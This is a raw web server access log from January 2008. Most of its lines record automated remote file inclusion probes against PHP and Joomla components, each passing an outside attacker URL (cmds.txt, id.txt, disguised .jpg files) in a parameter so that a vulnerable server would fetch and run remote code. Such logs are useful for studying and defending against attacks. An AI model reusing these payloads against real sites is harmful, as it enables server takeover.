59.148.232.33 - - [03/Jan/2008:09:05:28 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:31 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:31 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:31 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:31 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [03/Jan/2008:09:05:32 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:32 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:32 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.148.232.33 - - [03/Jan/2008:09:05:32 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:33 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:33 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:33 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:33 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:33 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=http://www.workinghome2004.com//chat/inc/langs/fr.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:33 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:34 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:34 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:36 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:05:36 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:38 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:38 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:39 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:39 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:41 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:42 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:42 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:42 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:42 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:42 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:46 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:46 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:46 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:47 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [03/Jan/2008:09:05:47 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:49 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:09:05:49 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:09:05:49 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:09:05:49 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:49 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:09:05:49 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:09:05:49 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:09:05:49 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:50 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:50 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:50 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:50 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:50 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:50 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:50 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:50 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:51 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:51 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:51 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:51 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:51 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:51 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:51 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:53 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:53 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:54 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:55 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:56 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:05:57 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:06:24 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:06:24 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:06:25 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:09:06:33 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:09:06:33 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [03/Jan/2008:09:06:34 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:06:40 -0800] "GET /logs/access_071220.log///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:06:40 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:06:40 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.141.206 - - [03/Jan/2008:09:07:16 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:09:07:24 -0800] "GET /logs/access_071222.log/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [03/Jan/2008:09:07:24 -0800] "GET /logs/access_071222.log/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.35 - - [03/Jan/2008:09:08:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.75 - - [03/Jan/2008:09:08:09 -0800] "GET /logs/access_070621.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:08:43 -0800] "GET /logs/access_071222.log/modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [03/Jan/2008:09:08:47 -0800] "GET /logs/access_071222.log///modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:09:09:48 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:09:09:49 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
74.6.24.225 - - [03/Jan/2008:09:10:16 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.7.203.201 - - [03/Jan/2008:09:10:40 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.7.203.201 - - [03/Jan/2008:09:10:40 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.230.199.108 - - [03/Jan/2008:09:12:36 -0800] "GET //skin/zero_vote/error.php?dir=http://www.majalahperkahwinan.com/mp/components/com_rwcards/01.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:09:12:52 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/batam/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:09:12:52 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/batam/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:09:12:56 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
196.40.106.216 - - [03/Jan/2008:09:12:57 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
74.6.24.21 - - [03/Jan/2008:09:13:33 -0800] "GET /bikes/CreSTOC07/?D=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.138.130.163 - - [03/Jan/2008:09:13:58 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.138.130.163 - - [03/Jan/2008:09:21:31 -0800] "GET /logs/access_071218.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.138.130.163 - - [03/Jan/2008:09:21:31 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.138.130.163 - - [03/Jan/2008:09:21:32 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.138.130.163 - - [03/Jan/2008:09:21:37 -0800] "GET /logs/access_071219.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.40.5.38 - - [03/Jan/2008:09:25:15 -0800] "GET //tools/admin.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.53.108.3 - - [03/Jan/2008:09:25:44 -0800] "GET //tools/admin.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.53.108.3 - - [03/Jan/2008:09:25:53 -0800] "GET /logs/access_071224.log//tools/admin.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.53.108.3 - - [03/Jan/2008:09:25:53 -0800] "GET //tools/admin.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.53.108.3 - - [03/Jan/2008:09:25:53 -0800] "GET /logs//tools/admin.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:09:27:20 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.178.128.116 - - [03/Jan/2008:09:27:27 -0800] "GET /logs/access_071224.log//akocomments.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [03/Jan/2008:09:27:27 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.40.5.38 - - [03/Jan/2008:09:29:53 -0800] "GET /logs/access_071224.log//tools/admin.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.40.5.38 - - [03/Jan/2008:09:29:53 -0800] "GET //tools/admin.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.40.5.38 - - [03/Jan/2008:09:29:54 -0800] "GET /logs//tools/admin.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.134.155.211 - - [03/Jan/2008:09:30:54 -0800] "GET /presto/ HTTP/1.0" 500 4595 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
212.134.155.211 - - [03/Jan/2008:09:30:55 -0800] "GET /favicon.ico HTTP/1.0" 500 3618 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
74.6.24.10 - - [03/Jan/2008:09:31:17 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
